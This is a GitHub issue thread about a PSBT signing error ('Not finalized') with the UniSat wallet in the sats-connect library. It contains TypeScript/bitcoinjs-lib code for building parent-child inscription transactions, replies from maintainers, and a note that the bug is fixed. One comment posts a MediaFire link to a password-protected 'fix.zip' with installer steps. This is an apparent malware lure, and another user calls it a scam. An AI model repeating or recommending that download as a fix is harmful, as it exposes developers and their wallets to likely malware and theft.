### ISSUE TITLE
Not finalized - an error occurred while signing the PSBT using the UniSat wallet.

### ISSUE THREAD

**Issue by tehal-lz** [secretkeylabs/sats-connect#166]
The code provided works fine with the Xverse wallet, but it throws the following error when trying to sign the transaction with the UniSat wallet.

// error 
```js
{
    "code": -32603,
    "message": "Not finalized",
    "data": {
        "originalError": {
            "message": "Not finalized",
            "stack": "Error: Not finalized\n    at g.value (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:874891)\n    at chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2763177\n    at f (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2544732)\n    at Generator.<anonymous> (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2544490)\n    at Generator.next (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2545087)\n    at d (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2549372)\n    at i (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2549570)\n    at chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2549629\n    at new Promise (<anonymous>)\n    at ho.<anonymous> (chrome-extension://ppbibelpcjmhbdihakflkdcoccbgbkpo/background.js:1:2549511)"
        }
    }
}
```

//frontend code (ReactJS)
```js
import Wallet, { AddressPurpose } from 'sats-connect';

const ordinals = ["xxxxxxx1", "xxxxx2"];
const { psbtBase64, paymentInputIndices, ordinalInputIndices, psbtHex } =
  await createParentChildPsbt(
    ordinals,
    paymentAddress, // The Natvie Segwit (P2WPKH) address.
    paymentPublicKey, // The Natvie Segwit (P2WPKH) address public key.
    ordinalsPublicKey, // The buyer's ordinal address' public key.
    feeRate:28
  );

const {
  result: { psbt, txid },
  status,
} = await Wallet.request("signPsbt", {
  psbt: psbtBase64,
  broadcast: true,
  signInputs: {
    [paymentAddress]: [...ordinalInputIndices, ...paymentInputIndices],
    // [ordinalsAddress]: ordinalInputIndices,
  },
});
```

//backend code  NodeJS
```js
// ordinals ["xxxxxxx1", "xxxxx2"]
// sender's paymentAddress 
// paymentPublicKey & ordinalPublicKey are same as unisat wallet only returns 1 addressType. I'm using the Native Segwit (P2WPKH) address Type


import * as bitcoin from "bitcoinjs-lib"; //version 6.1.3

export async function createParentChildPSBT(
  ordinals: string[],       
  paymentAddress: string, 
  paymentPublicKey: string, //
  ordinalPublicKey: string,
  feeRate: number
): Promise<{
  psbtBase64: string;
  paymentInputIndices: number[];
  ordinalInputIndices: number[];
  psbtHex: string;
}> {
  const receiveAddress = 'someOtherAccountReciever-address';

  const psbt = new bitcoin.Psbt({ network: bitcoin.networks.testnet });
  const ordinalInputIndices: number[] = [];
  const paymentInputIndices: number[] = [];

  let totalInput = 0;
  let numberOfParents = 0; // number of parent inscriptions
  
  if (ordinals.length > 0) {
    numberOfParents = ordinals.length;

    // add inputs and outputs for all inscriptions
    for (const ordinal of ordinals) {
      // fetched from https://testnet-explorer.ordinalsbot.com/inscription/${ordinal.id}
      const inscriptionInfo = await getInscriptionInfoById(ordinal.id);

      if (!inscriptionInfo) {
        throw new ORDError(`Inscription info not found for ${ordinal.id}`);
      }

      const [inscriptionUtxoTxId, inscriptionUtxoVout] = inscriptionInfo.output.split(':');

      // parent input
      const { input } = await getInscriptionInputUtxo(inscriptionUtxoTxId, inscriptionUtxoVout, ordinalPublicKey);

      // Add input for parent inscription
      psbt.addInput(input);
      ordinalInputIndices.push(psbt.txInputs.length - 1);
      totalInput += parseInt(inscriptionInfo.value);

      // Add output for parent inscription
      psbt.addOutput({
        address: receiveAddress,
        value: parseInt(inscriptionInfo.value),
      });
    }
  }

  // Calculate the total amount needed (charge amount + estimated fee)
  const estimatedFee = calculateTxBytesFeeWithRate(
    numberOfParents + 1, // parent inputs + 1 fee input
    numberOfParents + 2, // parent outputs + charge output + change output
    feeRate
  );

  const totalAmountNeeded = 1000 + estimatedFee;

  // Select UTXOs for the fee payment
  const buyerPaymentUTXOArr = await selectPaymentUTXOs(
    paymentAddress,
    totalAmountNeeded,
    numberOfParents,
    numberOfParents + 2,
    '', // Empty string for feeRateTier as we're using feeRate
    feeRate
  );

  if (!buyerPaymentUTXOArr || buyerPaymentUTXOArr.length === 0) {
    throw new ORDError("Insufficient funds to cover the transaction");
  }

  // Add inputs for fee payment
  for (const utxo of buyerPaymentUTXOArr) {
    const input = await getInputFromUtxo(
      utxo,
      paymentAddress,
      paymentPublicKey
    );

    psbt.addInput(input);

    paymentInputIndices.push(psbt.txInputs.length - 1);
    totalInput += utxo.value;
  }

  // Add output for the charge amount
  psbt.addOutput({
    address: paymentAddress,
    value: 1000, // any amount
  });

  // Calculate and add change output if necessary
  const totalOutput = psbt.txOutputs.reduce(
    (sum, output) => sum + output.value,
    0
  );
  const actualFee = calculateTxBytesFeeWithRate(
    psbt.txInputs.length,
    psbt.txOutputs.length,
    feeRate
  );
  const changeAmount = totalInput - totalOutput - actualFee;

  if (changeAmount > 546) {
    // Only add change output if it's above dust limit
    psbt.addOutput({
      address: paymentAddress,
      value: changeAmount,
    });
  }

  return {
    psbtBase64: psbt.toBase64(),
    ordinalInputIndices,
    paymentInputIndices,
    psbtHex: psbt.toHex(),
  };
}

async function getInscriptionInputUtxo(
  utxoTxId: string,
  utxoVout: any,
  ordinalPublicKey: string,
  additionalData: object = {}
):Promise<any>  {
  //fetched from https://mempool.space/testnet/api/tx/${utxoTxId}/hex
  const tx = bitcoin.Transaction.fromHex(await getRawTxHex(utxoTxId));
  if (!ordinalPublicKey) {
    for (const output in tx.outs) {
      try {
        tx.setWitness(parseInt(output), []);
      } catch {}
    }
  }
  const input: any = {
    hash: utxoTxId,
    index: parseInt(utxoVout),
    // nonWitnessUtxo: tx.toBuffer(),
    witnessUtxo: tx.outs[parseInt(utxoVout)],
    ...additionalData,
  };

  const script = tx.outs[parseInt(utxoVout)].script;

  // Check if it's a P2SH input
  if (script[0] === 0xa9 && script[1] === 0x14 && script[script.length - 1] === 0x87) {
    const redeemScript = bitcoin.payments.p2sh({
      redeem: { output: script, network: bitcoin.networks.testnet },
      network: bitcoin.networks.testnet,
    }).redeem?.output;
    if (redeemScript) {
      input.redeemScript = redeemScript;
    }
  }
  return {input, tx};
}

async function getInputFromUtxo(
  utxo: any,
  address: string,
  publicKey: string
): Promise<any> {
  //fetched from https://mempool.space/testnet/api/tx/${utxo.txid}/hex
  const tx = bitcoin.Transaction.fromHex(await getRawTxHex(utxo.txid))
  const input: any = {
    hash: utxo.txid,
    index: utxo.vout,
    // nonWitnessUtxo: tx.toBuffer(),
    witnessUtxo: tx.outs[parseInt(utxo.vout)],
  }

  const script = tx.outs[parseInt(utxo.vout)]?.script;

  // Check if it's a P2SH input
  if (script && script[0] === 0xa9 && script[1] === 0x14 && script[script?.length - 1] === 0x87) {
    console.log("P2SH input detected");
    const redeemScript = bitcoin.payments.p2sh({
      redeem: { output: script, network: bitcoin.networks.testnet },
      network: bitcoin.networks.testnet,
    }).redeem?.output;
    if (redeemScript) {
      input.redeemScript = redeemScript;
    }
  }

  // Check if it's a P2SH address
  if (address.startsWith('3') || address.startsWith('2')) {
    const redeemScript = bitcoin.payments.p2sh({
      redeem: bitcoin.payments.p2wpkh({ 
        pubkey: Buffer.from(publicKey, 'hex'),
        network: bitcoin.networks.testnet 
      }),
      network: bitcoin.networks.testnet
    }).redeem?.output;
    if (redeemScript) {
      input.redeemScript = redeemScript;
    }
  }

  return input
}
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tehal-lz** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what is this?

**Comment by DuskaT021** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> what is this?

he is a scammer, do not open

**Comment by tehal-lz** [comment]
@aryzing, could you please assist me with this?

**Comment by teebszet** [comment]
hi @tehal-lz thanks for submitting the report. 

we're looking into it!

**Comment by skyrover7** [comment]
@tehal-lz did you find a work around for this?

@teebszet i am facing essentially the same issue. i will also note that if i don't broadcast and try to use the signed psbt coming back from unisat, it is in hex format, whereas from xverse it is in base64 format.

**Comment by victorkirov** [comment]
This should be fixed in the latest version of sats-connect. Please update 🙏
